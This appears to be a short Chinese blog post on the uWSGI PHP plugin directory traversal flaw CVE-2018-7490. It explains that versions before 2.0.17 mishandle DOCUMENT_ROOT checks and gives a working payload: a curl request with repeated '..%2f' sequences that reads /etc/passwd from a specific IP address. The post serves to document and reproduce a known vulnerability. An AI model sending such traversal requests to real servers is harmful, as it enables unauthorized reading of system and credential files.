uWSGI PHP目录穿越漏洞(CVE-2018-7490)

uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言。

uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。

payload

curl http://188.40.189.134:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd

大概就这些......

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注